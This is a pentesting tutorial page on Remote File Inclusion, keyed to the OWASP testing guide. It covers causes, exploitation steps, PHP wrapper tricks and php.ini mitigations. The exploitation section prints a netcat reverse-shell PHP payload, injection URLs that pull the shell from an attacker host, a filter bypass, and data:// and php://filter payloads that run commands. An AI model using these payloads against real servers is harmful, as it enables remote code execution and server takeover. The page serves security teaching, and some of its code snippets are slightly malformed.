Skip to content

RFI attack - Remote File Inclusion

OWASP

OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.1. Testing Directory Traversal File Include

ID Link to Hackinglife Link to OWASP Description
5.1 WSTG-ATHZ-01 Testing Directory Traversal File Include - Identify injection points that pertain to path traversal. - Assess bypassing techniques and identify the extent of path traversal (dot-dot-slash attack, Local/Remote file inclusion)

A Remote File Inclusion (RFI) vulnerability is a type of security flaw found in web applications that allow an attacker to include and execute remote files on a web server. This vulnerability arises due to improper handling of user-supplied input within the context of file inclusion operations. This vulnerability can have severe consequences, including unauthorized access, data theft, and even full compromise of the affected server.

Causes

  • Insufficient Input Validation: The web application may not validate or filter user input, allowing attackers to inject malicious data.
  • Lack of Proper Sanitization: Even if input is validated, the application may not adequately sanitize the input before using it in file inclusion operations.
  • Using User Input in File Paths: Applications that dynamically include files based on user input are at high risk if they don't carefully validate and control that input.
  • Failure to Implement Security Controls: Developers might overlook security best practices, such as setting proper file permissions or using security mechanisms like web application firewalls (WAFs).

How to exploit it?

Identify Vulnerable Input: The attacker identifies a web application that accepts user input and uses it in a file inclusion operation, typically in the form of a URL parameter or a POST request parameter.

Inject Malicious Payload: The attacker injects a malicious file path or URL into the vulnerable parameter. For example, they might replace a legitimate parameter like ?page=about.php with ?page=http://evil.com/malicious_script.

Server Executes Malicious Code: When the web application processes the attacker's input, it dynamically includes the remote file or URL. This can lead to remote code execution on the web server, as the malicious code in the included file is executed in the server's context.

php

In php.ini file there are some parameters that define this policy:

  • allow_url_fopen
  • allow_url_include

If these functions are enabled (set to ON), then a LFI can turned into a Remote File Inclusion.

1. Create a php file with the remote shell

nano reverse.txt

2. In that php file, craft malicious code

<?php
passthru("nc -e /bin/sh <attacker IP> <attacker port>") 
php ?>
3. Serve that file from you machine (http_serve).

4. Get your machine listening in a port with netcat.

5. In the injection point from where you can make a call to a URL, serve your file. For instance:

https:\\VICTIMurlADDRESS/PATH/PATH/page=http://<attackerip>/reverse.txt

# Sometimes to get php executed on the victim machin (and not the attacker), add an ?
https:\\VICTIMurlADDRESS/PATH/PATH/page=http://<attackerip>/reverse.txt?

Sometimes there might be some filtering for the payload (which was:

http://<attackerip>/reverse.txt?). 
````

To bypass it:

using uppercase

https:\VICTIMurlADDRESS/PATH/PATH/page=hTTP:///reverse.txt

Other bypassing techniques for slashes

## Wrappers

### PHP wrapper

php://filter : allow the attacker to include local file and base64 encode as the output:
http://IPdomain/rfi.php?language=php://filter/convert.base64-encode/resource=recurso.php
PHP filter without base64 encode:
php://filter/resource=flag.txt
### DATA wrapper
http://IPdomain/rfi.php?language=data://text/plain,<?php system('$_GET("cmd")');?>&cmd=whoami
### HTTP wrapper
http://IPdomain/rfi.php?language=http://SERVERIP/shell.php ```

Mitigation

In php.ini disallow:

  • allow_url_fopen
  • allow_url_include

User static file inclusion (instead of dynamic file inclusion) by harcoding the files you want to include and not get them using GET or POST methods.

Tools and payloads

Last update: 2024-04-08
Created: January 18, 2023 20:02:39